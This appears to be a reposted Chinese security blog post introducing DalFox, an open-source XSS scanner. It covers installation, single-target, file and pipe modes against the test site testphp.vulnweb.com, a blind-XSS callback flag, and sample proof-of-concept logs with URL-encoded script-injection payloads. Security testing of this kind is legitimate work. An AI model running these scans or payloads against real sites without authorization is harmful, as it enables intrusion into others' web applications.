XSS扫描和参数分析工具

admin 2023年3月18日16:22:43XSS扫描和参数分析工具已关闭评论80 views字数 1262阅读4分12秒阅读模式


DalFox是一款功能强大的开源XSS扫描工具和参数分析器,可快速检测和验证XSS缺陷的过程。它带有强大的测试引擎,为测试人员提供了许多便利的功能!


0x01 工具安装

1、GO1.17:

go install github.com/hahwul/dalfox/v2@latest


2、GO1.16

brew tap hahwul/dalfoxbrew install dalfox


3、ubuntu

sudo snap install dalfox


0x02 基本用法

dalfox [mode] [target] [flags] 

1、单目标模式    

dalfox url http://testphp.vulnweb.com/listproducts.php\?cat\=123\&artist\=123\&asdf\=ff \  -b https://hahwul.xss.ht
图片


2、文件的多目标模式

dalfox file urls_file --custom-payload ./mypayloads.txt
图片


3、流水线模式

cat urls_file | dalfox pipe -H "AuthToken: bbadsfkasdfadsf87"
图片
图片


0x03 测试POC格式

示例 POC 日志

[POC][G][BUILT-IN/dalfox-error-mysql/GET] http://testphp.vulnweb.com/listproducts.php?artist=123&asdf=ff&cat=123DalFox[POC][V][GET] http://testphp.vulnweb.com/listproducts.php?artist=123&asdf=ff&cat=123%22%3E%3Csvg%2Fclass%3D%22dalfox%22onLoad%3Dalert%2845%29%3E

这是一种通过切割等更容易解析 poc 代码的方法。例如,可以执行此操作:

dalfox url http://testphp.vulnweb.com/listproducts.php\?cat\=123\&artist\=123\&asdf\=ff \  | cut -d " " -f 2 > outputcat output# http://testphp.vulnweb.com/listproducts.php?artist=123&asdf=ff&cat=123DalFox# http://testphp.vulnweb.com/listproducts.php?artist=123&asdf=ff&cat=123%22%3E%3Csvg%2FOnLoad%3D%22%60%24%7Bprompt%60%60%7D%60%22+class%3Ddalfox%3E


后台回复:230316,获取工具包


图片


声明:该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白名单。

请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与本公众号无关。

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年3月18日16:22:43
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   XSS扫描和参数分析工具https://cn-sec.com/archives/1610993.html